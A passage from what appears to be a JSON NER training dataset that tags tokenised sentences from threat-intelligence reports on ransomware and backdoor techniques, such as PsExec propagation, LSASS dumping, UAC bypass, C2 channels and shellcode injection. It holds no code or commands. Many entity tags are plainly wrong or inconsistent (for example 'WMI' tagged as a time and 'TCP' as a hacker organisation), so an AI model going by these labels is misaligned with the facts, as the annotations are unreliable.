"ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ranswomare", "for", "Windows", "can", "self-propagate", "in", "the", "local", "area", "network", "using", "the", "legitimate", "PsExec", "utility", "(contained", "in", "its", "body),", "which", "creates", "a", "temporary", "system", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Legitimate", "accounts", "obtained", "by", "the", "attackers", "can", "be", "used", "to", "ensure", "persistence", "in", "the", "compromised", "infrastructure." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "B-Purp" ] }, { "tokens": [ "may", "use", "stolen", "legitimate", "accounts", "specified", "in", "the", "configuration", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "the", "command", "shell", "to", "run", "appropriate", "commands" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "additional", "BAT", "file", "contained", "in", "the", "body", "of", "the", "ransomware." ], "ner_tags": [ "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "attackers", "may", "use", "wmic", "to", "obtain", "information", "and", "run", "various", "commands," ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "They", "may", "also", "use", "the", "wmiexec", "module", "from", "Impacket", "to", "execute", "commands", "and", "move", "across", "the", "network." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "wmic", "to", "obtain", "the" ], "ner_tags": [ "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ransomware", "uses", "Native", "API." ], "ner_tags": [ "O", "O", "I-Tool", "O" ] }, { "tokens": [ "the", "function", "CreateProcessWithLogonW." ], "ner_tags": [ "O", "O", "B-SamFile" ] }, { "tokens": [ "affiliates", "may", "exploit", "group", "policies,", "which", "results", "in", "a", "scheduled", "task", "being", "created", "(on", "each", "host)", "that", "launches", "the", "ransomware." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "disabling", "security", "tools" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "To", "prevent", "being", "detected,", "the", "attackers", "end", "processes", "and", "services", "related", "to", "security", "and", "antivirus", "software." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "bypass", "UAC,", "BlackCat", "ransomware", "may", "escalate", "privileges", "using", "the", "ICMLuaUtil", "COM", "interface,", "as", "well", "as", "use", "the", "Masquerade", "PEB", "method." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "Bypass", "User", "Account", "Control;The", "attackers", "may", "bypass", "UAC", "using", "the", "ICMLuaUtil", "COM", "interface,", "as", "well", "as", "use", "the", "Masquerade", "PEB", "method." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "decrypts", "configuration", "data", "as", "well", "as", "decrypts", "and", "unpacks", "the", "legitimate", "PsExec", "utility" ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "unpacks", "the", "legitimate", "PsExec", "utility" ], "ner_tags": [ "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ransomware", "uses", "obfuscation." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "use", "a", "SoftPerfect", "Network", "Scanner", "executable", "renamed", "to", "svchost.exe." ], "ner_tags": [ "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "uses", "PsExec", "to", "modify", "the", "system", "registry", "parameter", "MaxMpxCt" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "obtain", "authentication", "data,", "the", "attackers", "may", "dump", "the", "LSASS", "process", "using", "legitimate", "tools", "(procdump,", "comsvcs.dll)." ], "ner_tags": [ "O", "O", "B-Purp", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "To", "obtain", "authentication", "data", "from", "the", "registry", "and", "files,", "the", "attackers", "may", "use", "NirSoft", "utilities." ], "ner_tags": [ "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "attackers", "enumerate", "drives,", "directories,", "and", "files" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "search", "for", "sensitive", "information", "for", "exfiltration", "purposes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "attackers", "collect", "information", "from", "the", "local", "system", "for", "exfiltration", "purposes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "B-Purp" ] }, { "tokens": [ "The", "attackers", "may", "use", "RDP", "to", "move", "across", "the", "network." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "uses", "wmic", "to", "obtain", "the", "UUID", "of", "the", "compromised", "host." ], "ner_tags": [ "O", "B-Way", "O", "I-Purp", "I-Purp", "I-Purp", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "enumerates", "all", "running", "processes" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ ";Moving", "across", "the", "victim’s", "network", "and", "deploying", "ransomware", "involves", "copying", "related", "tools", "to", "the", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "self-propagate", "in", "the", "network", "by", "using", "the", "legitimate", "PsExec", "utility" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "to", "search", "for", "ones", "relating", "to", "security" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "enumerates", "system", "services", "to", "search", "for", "ones", "relating", "to", "security" ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Before", "exfiltration,", "the", "attackers", "may", "put", "collected", "data", "in", "7Zip", "archives." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remote", "access", "tools", "used", "by", "the", "attackers", "may", "use", "application", "layer", "protocols", "(HTTP,", "HTTPS," ], "ner_tags": [ "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "B-Way" ] }, { "tokens": [ "When", "the", "attackers", "use", "Cobalt", "Strike,", "the", "collected", "information", "may", "be", "sent", "via", "Cobalt", "Strike", "server", "communication", "channels." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "To", "remotely", "access", "the", "compromised", "infrastructure,", "the", "attackers", "may", "use", "the", "legitimate", "tools", "TeamViewer", "and", "ScreenConnect." ], "ner_tags": [ "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "To", "remotely", "access", "the", "compromised", "infrastructure,", "the", "attackers", "may", "use", "Cobalt", "Strike,", "TeamViewer", "and", "ScreenConnect" ], "ner_tags": [ "O", "O", "O", "O", "I-Purp", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "B-Way" ] }, { "tokens": [ "which", "perform", "asymmetric/symmetric", "encryption", "of", "the", "C&C", "server", "communication", "channel." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "attackers", "copy", "tools", "necessary", "for", "deployment", "to", "the", "compromised", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "executes", "a", "command", "to", "delete", "itself", "from", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "delete", "key", "files" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "attackers", "have", "been", "seen", "using", "several", "methods", "to", "distribute", "the", "wiper", "through", "the", "domain,", "like:", "domain", "Group", "Policy", "Object", "(GPO)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "installs", "the", "payload", "as", "a", "service" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sets", "a", "hardcoded", "list", "of", "system", "directories" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "system", "directories", "are", "targeted" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "enumerates", "their", "partitions." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "an", "obfuscated", ".NET", "program." ], "ner_tags": [ "O", "O", "B-Way", "O" ] }, { "tokens": [ "WMI" ], "ner_tags": [ "B-Time" ] }, { "tokens": [ "to", "identify", "where", "the", "Operative", "System", "is", "stored", "in", "the", "disk" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Application-level", "protocol" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "sends", "the", "output", "of", "ipconfig", "in", "a", "POST", "request" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "opening", "of", "a", "URL", "file", "extracted", "from", "the", "archive." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "output", "of", "ipconfig", "was", "sent", "to", "one", "of", "two", "addresses" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Application-level", "protocol" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "a", "GET", "request", "is", "sent", "to", "the", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "application-level", "messages", "from", "the", "server", "to", "the", "client", "is", "sent", "as", "the", "body", "of", "an", "HTTP", "response" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "are", "sent", "using", "separate", "POST", "requests." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "an", "HTTPS", "request" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "same", "IP", "address", "was", "used", "as", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "domains", "give", "attackers", "the", "ability", "to", "mask", "malicious", "traffic", "as", "legitimate", "activity", "within", "the", "company" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HttpConnector", "and", "HttpBindConnector", "are", "HTTP", "client", "with", "support", "for", "proxy", "and", "HTTP", "server." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HTTP", "and", "HTTPS", "are", "supported" ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "HTTP", "with", "long", "polling" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "connect", "by", "sending", "a", "GET", "request", "to", "a", "URL", "from", "the", "configuration", "and", "provide", "a", "special", "cookie", "value" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "GET", "requests", "with", "pull", "operations." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POST", "request", "with", "push", "operation" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Application-level", "protocol" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "use", "HTTP/HTTPS", "for", "C2", "connections" ], "ner_tags": [ "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "An", "encrypted", "resume" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "archive" ], "ner_tags": [ "O" ] }, { "tokens": [ "archive", "contains", "a", "bait", "PDF", "document" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XOR", "encrypted", "with", "a", "16-byte", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "with", "VMProtect" ], "ner_tags": [ "O", "O", "B-Features" ] }, { "tokens": [ "additional", "XOR", "encryption", "with", "the", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AES-128-CBC", "for", "encryption." ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "hashed", "with", "MD5" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "use", "AES-128", "in", "CFB", "mode", "as", "the", "encryption", "algorithm" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "with", "the", "algorithm" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "a", "RAR", "archive" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "distributed", "in", "a", "RAR", "archive" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "ROR-13", "hash" ], "ner_tags": [ "B-Idus", "O" ] }, { "tokens": [ "re-encrypted", "and", "saved", "in", "the", "same", "location" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "header" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "encrypted", "Base64", "string", "containing", "the", "session", "GUID" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "compressed", "with", "GZip", "prior", "to", "encryption" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "are", "obfuscated", "with", "VMProtect" ], "ner_tags": [ "O", "O", "O", "B-Features" ] }, { "tokens": [ "obfuscated" ], "ner_tags": [ "O" ] }, { "tokens": [ "obfuscated", "code" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "is", "encrypted", "in", "the", "file" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "re-encrypted" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "has", "been", "obfuscated", "with", "the", "same", "rel_jmp", "and", "fake-jb", "techniques" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "SFX", "archive" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "SFX", "archive" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "RAR", "and", "SFX-RAR", "files" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "plus", "the", "folder" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "malicious", "archive," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "located", "in", "the", "data", "sections" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "shellcode", "is", "located", "in", "a", "PE", "file", "overlay." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "(encrypted)", "shellcode" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "consists", "of", "two", ".exe", "files." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "contains", "three", "identical", "executable", "files" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "contains", "just", "one", "file:" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "which", "is", "also", "embedded", "inside", "the", "CHM", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "three", "sections", "are", "extracted" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "malicious", "shortcuts" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Web", "lnks", "with", "two", "shortcuts:" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "copies", "the", "payload", "to", "the", "folder", "C:\\Users\\Public\\Downloads" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PDF", "documents", "with", "a", "CV", "and", "IELTS", "certificate" ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "the", "folder", "C:\\Users\\Public" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "copied", "to", "the", "folder", "%appdata%\\Microsoft\\AddIns\\" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "into", "the", "folder", "c:\\programdata" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "folder", "c:\\programdata" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "trying", "to", "open", "either", "of", "the", "shortcuts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "the", "user", "opens", "it", "directly" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "tries", "to", "make", "users", "run", "malicious", ".lnk,", ".chm,", "and", ".exe", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "running", "a", "command", "that", "extracts", "a", "Base64-encoded", "CAB", "archive", "from", "the", "body", "of", "the", "LNK", "file," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "archive", "is", "unpacked", "to", "a", "temporary", "folder." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "extracted", "JS", "script" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "extract", "shellcode" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decrypts", "the", "string" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "used", "for", "decryption:" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "is", "unpacked" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "unpacks" ], "ner_tags": [ "O" ] }, { "tokens": [ "encrypted", "portion", "of", "the", "data", "is", "decrypted" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "decrypted" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decryption", "and", "decompression" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decryption" ], "ner_tags": [ "O" ] }, { "tokens": [ "decodes", "it", "into", "shellcode", "with", "Base64" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypt" ], "ner_tags": [ "O" ] }, { "tokens": [ "uses", "a", "custom", "PL", "format", "with", "encryption" ], "ner_tags": [ "O", "O", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "adding", "itself", "to", "the", "startup", "folder" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "writes", "the", "file", "svchost.bat,", "which", "transfers", "control", "to", "winness.exe,", "to", "the", "startup", "folder" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "persists", "by", "means", "of", "a", "registry", "run", "key", "or", "a", "startup", "folder" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "adding", "a", "scheduler", "task," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "creates", "a", "task", "with", "schtasks", "for", "persistence" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "that", "all", "three", "intermediate", "C2", "servers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "possible", "proxy", "servers", "(any", "indicated", "in", "the", "configuration", "plus", "system", "proxies)", "and", "C2", "servers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "domains", "give", "attackers", "the", "ability", "to", "mask", "malicious", "traffic", "as", "legitimate", "activity", "within", "the", "company" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "proxy", "server" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "proxy" ], "ner_tags": [ "O" ] }, { "tokens": [ "–", "proxy", "server", "address", "and", "credentials" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "proxy", "server" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "collects", "and", "sends", "system", "information" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "OS", "uptime" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Operating", "system", "version", "and", "whether", "it", "is", "32-bit", "or", "64-bit" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Computer", "name", "Name", "of", "running", "module", "PID" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shellcode", "version", "and", "whether", "it", "is", "32-bit", "or", "64-bit" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Whether", "the", "OS", "is", "32-bit", "or", "64-bit" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Computer", "name" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "collect", "information", "about", "the", "computer", "name", "and", "OS", "version", "and", "whether", "it", "is", "32-bit", "or", "64-bit" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Network", "adapter", "IP", "addresses", "MAC", "address", "of", "one", "of", "the", "adapters" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "List", "of", "IP", "addresses" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "MAC", "addresses", "of", "network", "adapters" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Collects", "the", "configuration", "of", "active", "connector", "instances", "other", "than", "the", "RPCConnector", "and", "RPCBindConnector", "classes." ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "collect", "information", "about", "the", "IP", "and", "MAC", "addresses", "of", "the", "infected", "machine" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Username" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Username", "and", "workgroup" ], "ner_tags": [ "B-Idus", "O", "O" ] }, { "tokens": [ "collect", "information", "about", "the", "name", "of", "the", "current", "user" ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Transport-level", "protocol" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Standard", "TCP", "connection" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "two", "TCP", "connections." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Duplication", "of", "socket", "with", "TLS", "connection" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "establishes", "a", "TCP", "connection" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "messages", "are", "exchanged", "in", "the", "original", "TCP", "connection", "(without", "TLS", "encryption)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KCP", "protocol" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "uses", "KCP", "on", "top", "of", "a", "TCP", "connection" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "three", "ways", "to", "connect", "to", "the", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Transport", "protocol", "3,", "port", "8443", "Transport", "protocol", "2,", "port", "80", "Transport", "protocol", "1,", "port", "8080" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TcpConnector", "and", "TcpBindConnector", "are", "classes", "responsible", "for", "connecting", "over", "TCP", "as", "client", "and", "server" ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Transport", "protocols", "TCP" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "RPC", "(Pipe)" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Network-level", "protocol" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "KCP", "protocol" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "KCP", "protocol" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "support", "for", "multiple", "transport", "protocols", "for", "connecting", "to", "C2", "servers" ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "use", "TCP", "and", "UDP", "for", "C2", "connections" ], "ner_tags": [ "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "AES-128", "is", "the", "encryption", "algorithm", "used." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "with", "AES-256-CBC;" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "is", "encrypted", "in", "the", "standard", "way" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "in", "the", "backdoor's", "standard", "way," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "data", "is", "encrypted", "in", "the", "standard", "way" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "AES", "for", "encrypting", "traffic", "in", "its", "backdoors" ], "ner_tags": [ "O", "B-Way", "O", "B-SamFile", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "injectors" ], "ner_tags": [ "O" ] }, { "tokens": [ "run", "it", "in", "an", "active", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "running", "an", "arbitrary", "command", "in", "a", "CHM", "file", "via", "an", "ActiveX", "object" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "runs", "in", "a", "new", "process" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "injected", "in", "a", "similar", "way" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injected", "into" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Crosswalk", "and", "Metasploit", "injectors" ], "ner_tags": [ "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "inject", "shellcode", "into", "the", "process" ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SeDebugPrivilege" ], "ner_tags": [ "O" ] }, { "tokens": [ "finds", "the", "API", "functions", "it", "needs" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Microsoft", "CryptoAPI" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Cryptography", "API:" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "via", "a", "ZwCreateSection", "call" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "via", "ZwMapViewOfSection", "calls" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "execute", "a", "method", "from", "the", ".NET", "assembly" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "HttpWebRequest", "and", "HttpListener", "from", ".NET", "Framework", "are", "used", "for", "client", "and", "server", "implementations" ], 